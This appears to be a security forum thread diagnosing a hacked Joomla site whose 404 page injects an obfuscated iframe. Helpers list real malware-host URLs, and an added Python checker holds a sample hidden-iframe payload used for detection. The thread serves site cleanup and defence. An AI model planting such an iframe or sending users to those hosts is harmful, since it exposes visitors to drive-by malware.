JS:ScriptUE in hxxp://www.erlotelebista.com

Hello,
our site hxxp://www.erlotelebista.com/

Avast is still showing it as containing a URL:Mal, is it a blacklist of Avast?

No other antivirus is detecting anything now. Also this is proof of the lack of any infection right now.

Thanks in advance.

Your site appears to have been hacked: there is no favicon, or a hacked favicon.ico file, and there is a call for that which generates a 404 error page which has most certainly been hacked, http://www.virustotal.com/file-scan/report.html?id=df15fc444d130b29c31f1a48d382f3f2072b84668b4d5976deb98aef8e82cdd3-1307985672.

Other image files also appear to have been hacked.

Hi acx,

Those that visit the site will get an avast Web Shield warning for JS:ScriptUE-inf[Trj] in -htxp://etc… logo.png
The site was hacked via a vulnerability, web admins should check their PHP and Joomla website application software for updates:
parts of the code could be still in Joomla 1.5.18 and not 1.5.21

PHP version is PHP/5.1.6, a version open to some recent by-pass vulnerabilities, 3 known to the software developer,

polonus

P.S. Code attached could be replaced to make the webpage more IE friendly…
this because the site runs Apache…
see: http://wepawet.iseclab.org/view.php?hash=e1667a2bc5725a999462548a2981bb71&t=1307997764&type=js

D

Just for more information, the script that David has pointed out, contained in the hacked 404 page, deobfuscates to an iframe, pointing to a site that is known for malware:

http://hosts-file.net/?s=213.182.197.42&view=matches

Interesting to note, the difference in detection at VT:
http://www.virustotal.com/file-scan/report.html?id=7ecef262a30618ec1b38b9b56931f35a059b9b0591b342a5f208fd75185394a3-1307997688
This is the iframe in my image as it is in a text file.
Seems detection is better on the obfuscation than the content?

(Though I imagine that VT overlooks some elements of the scanning…)

Hi spg SCOTT,

Thank you for that additional information, but most of the malware that resided there gives no response now, so dead; it had two unknown executables and some EXP/Pidief.W malware.
in resp.

-http://213.182.197.42/swf.php,
-http://213.182.197.42/load.php,
-http://213.182.197.42/pdf.php

also see: http://www.spamhaus.org/sbl/sbl.lasso?query=SBL75831

polonus

Hello,

How can I find where the malware is?

Thanks a lot

Click the images to expand; they will show some of the images, etc. that I had alerts on.

The fact is that they appear to have the same insertion point: the failed loading of those images results in the 404 error page, which has been hacked with the insertion of an obfuscated JavaScript document.write above the opening tag.
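As an added example (not code from anyone in this thread), a small Python checker for the pattern described in the thread: it statically decodes the unescape() and String.fromCharCode() wrappers inside document.write() calls, without evaluating any JavaScript, and reports each iframe they would write, whether it is hidden, and whether the script sits above the opening html tag. The 404 page content and the malware.example.invalid URL are constructed placeholders, not the real site.

```python
import re
from urllib.parse import unquote

# Constructed sample of a hacked 404 page (not the real one from the thread):
# an obfuscated document.write() sits above the opening <html> tag and
# writes out a hidden iframe once decoded.
SAMPLE_404 = (
    '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F'
    'malware.example.invalid%2Fload.php%22%20width%3D1%20height%3D1%20'
    'style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));</script>\n'
    '<html><head><title>404 Not Found</title></head>'
    '<body><h1>Not Found</h1></body></html>'
)

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
DOCWRITE_RE = re.compile(r"document\s*\.\s*write", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S | re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"src\s*=\s*['\"]?([^'\" >]+)", re.I)
# 0/1 pixel sizes or CSS hiding are the usual signs of an iframe meant to stay unseen
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def decode_payloads(script):
    """Decode unescape()/String.fromCharCode() wrappers (simplified: %uXXXX not handled)."""
    decoded = []
    for _, body in UNESCAPE_RE.findall(script):
        decoded.append(unquote(body))
    for codes in FROMCHARCODE_RE.findall(script):
        decoded.append("".join(chr(int(c)) for c in codes.split(",") if c.strip()))
    return "\n".join(decoded)

def find_injected_iframes(page):
    """Return one finding per iframe produced by an obfuscated document.write()."""
    findings = []
    html_start = page.lower().find("<html")
    for m in SCRIPT_RE.finditer(page):
        script = m.group(1)
        if not DOCWRITE_RE.search(script):
            continue
        for attrs in IFRAME_RE.findall(decode_payloads(script)):
            src = SRC_RE.search(attrs)
            findings.append({
                "src": src.group(1) if src else None,
                "hidden": bool(HIDDEN_RE.search(attrs)),
                "before_html_tag": html_start == -1 or m.start() < html_start,
            })
    return findings
```

Run find_injected_iframes() over the raw HTML of the site's 404 page (and any other page that raised an alert) and compare the reported src against the hosts-file.net or Spamhaus listings mentioned in the thread.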